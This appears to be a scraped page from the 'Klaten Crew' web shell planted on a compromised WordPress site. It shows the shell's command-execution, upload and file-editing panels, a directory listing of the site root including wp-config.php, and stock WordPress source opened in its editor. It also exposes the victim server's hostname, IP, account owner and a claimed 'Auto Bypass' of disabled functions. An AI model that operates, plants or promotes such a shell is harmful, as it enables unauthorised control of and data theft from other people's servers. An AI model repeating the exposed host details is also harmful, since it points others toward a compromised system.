HanJsXploit Klaten Crew
Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64
Apache
Server: 167.114.27.228
Your IP: 216.73.217.0
System Info
HOME
home
ipifapor
prosalud.ipifap.org
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-07-30 17:01:09
-
.well-known
Folder
-
0755
2023-05-17 11:17:03
.wp-cli
Folder
-
0755
2023-09-19 09:07:15
cgi-bin
Folder
-
0755
2023-05-17 11:16:11
wp-admin
Folder
-
0755
2026-05-20 23:52:22
wp-content
Folder
-
0755
2026-07-30 11:26:59
wp-includes
Folder
-
0755
2026-07-17 19:09:37
.htaccess
File
842 B
0644
2026-07-24 10:05:59
error_log
File
16.36 KB
0644
2026-07-28 16:46:45
index.php
File
405 B
0644
2020-02-06 17:03:12
license.txt
File
19.44 KB
0644
2026-05-20 23:52:23
readme.html
File
7.23 KB
0644
2026-07-17 19:09:37
wp-activate.php
File
7.2 KB
0644
2026-05-20 23:52:23
wp-blog-header.php
File
435 B
0444
2026-06-14 10:16:19
wp-comments-post.php
File
2.27 KB
0644
2023-08-16 04:29:10
wp-config-sample.php
File
3.26 KB
0644
2025-12-02 23:29:21
wp-config.php
File
3.14 KB
0644
2023-05-17 11:25:40
wp-cron.php
File
5.49 KB
0644
2024-11-12 23:49:51
wp-links-opml.php
File
2.43 KB
0644
2025-12-02 23:29:21
wp-load.php
File
3.84 KB
0644
2024-07-17 09:51:35
wp-login.php
File
50.63 KB
0644
2026-05-20 23:51:16
wp-mail.php
File
8.52 KB
0644
2025-12-02 23:28:31
wp-settings.php
File
31.88 KB
0644
2026-05-20 23:52:23
wp-signup.php
File
33.81 KB
0644
2026-05-20 23:51:15
wp-trackback.php
File
5.09 KB
0644
2025-12-02 23:29:21
xmlrpc.php
File
3.13 KB
0644
2025-04-15 23:48:28
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Klaten Crew WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: wp-links-opml.php
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux r5.a1center.net 4.18.0-513.5.1.lve.el8.x86_64 #1 SMP Tue Nov 21 10:14:49 UTC 2023 x86_64 Software: Apache PHP Version: 8.3.31 Protocol: HTTP/1.1 Server IP: 167.114.27.228 Your IP: 216.73.217.0 Mail: ON Curl: ON Owner: ipifapor MySQL: ON Disabled Functions: All functions are accessible Auto Bypass: ENABLED